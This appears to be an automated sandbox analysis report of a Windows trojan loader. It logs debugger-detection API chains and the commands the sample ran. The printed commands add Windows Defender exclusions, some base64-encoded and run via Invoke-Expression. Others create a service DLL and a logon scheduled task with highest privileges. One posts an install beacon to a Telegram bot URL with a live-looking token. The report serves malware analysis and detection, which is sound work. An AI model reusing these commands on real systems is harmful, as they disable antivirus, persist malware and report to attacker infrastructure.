    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h49_2_64946F50
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745025E64 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF745025E64
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9BD2A8 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6CF9BD2A8
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0AC568 FindClose,FindFirstFileExW,GetLastError,55_2_00007FF6BC0AC568
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0AC5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,55_2_00007FF6BC0AC5DC
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 46000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBBu
    Source: curlapp64.exe, 00000017.00000003.2358859802.000001830789A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3261137440.000001B531C2B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2679021257.00000267FDB81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Found API chain indicative of debugger detection
    Source: C:\Windows\System32\console_zero.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74501AD2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF74501AD2C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EAFE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,5_2_00007FF8B7EAFE30
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745029F50 GetProcessHeap,0_2_00007FF745029F50
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74501AD2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF74501AD2C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF7450145DC SetUnhandledExceptionFilter,0_2_00007FF7450145DC
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745014050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF745014050
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF7450143FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7450143FC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9A4AFC SetUnhandledExceptionFilter,5_2_00007FF6CF9A4AFC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9A491C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6CF9A491C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9A4570 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF6CF9A4570
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B158C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6CF9B158C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7ECA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF8B7ECA8B4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EC9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8B7EC9E30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F6E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF8B9F6E24C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F6D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF8B9F6D768
    Source: C:\Windows \System32\printui.exeCode function: 14_2_00007FF7BAC81B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF7BAC81B5C
    Source: C:\Windows \System32\printui.exeCode function: 14_2_00007FF7BAC81880 SetUnhandledExceptionFilter,14_2_00007FF7BAC81880
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_64947650
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,49_2_6828C940
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A70A0C08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00007FF8A70A0C08
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A7092CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_00007FF8A7092CA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00007FF8B7EBFA50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_00007FF8B7EBEE70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8129E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_00007FF8B8129E30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B812A8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00007FF8B812A8B4
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B17178 SetUnhandledExceptionFilter,49_2_00007FF8B8B17178
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B16630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_00007FF8B8B16630
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B16F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00007FF8B8B16F94
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B93CE24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_00007FF8B93CE24C
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0ADE40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,55_2_00007FF6BC0ADE40
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0BAE5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00007FF6BC0BAE5C
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8129E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,55_2_00007FF8B8129E30
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B812A8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00007FF8B812A8B4

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell decode and execute
    Source: Yara matchFile source: amsi64_6184.amsi.csv, type: OTHER
    Adds a directory exclusion to Windows Defender
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x882081
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bav64.exe "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
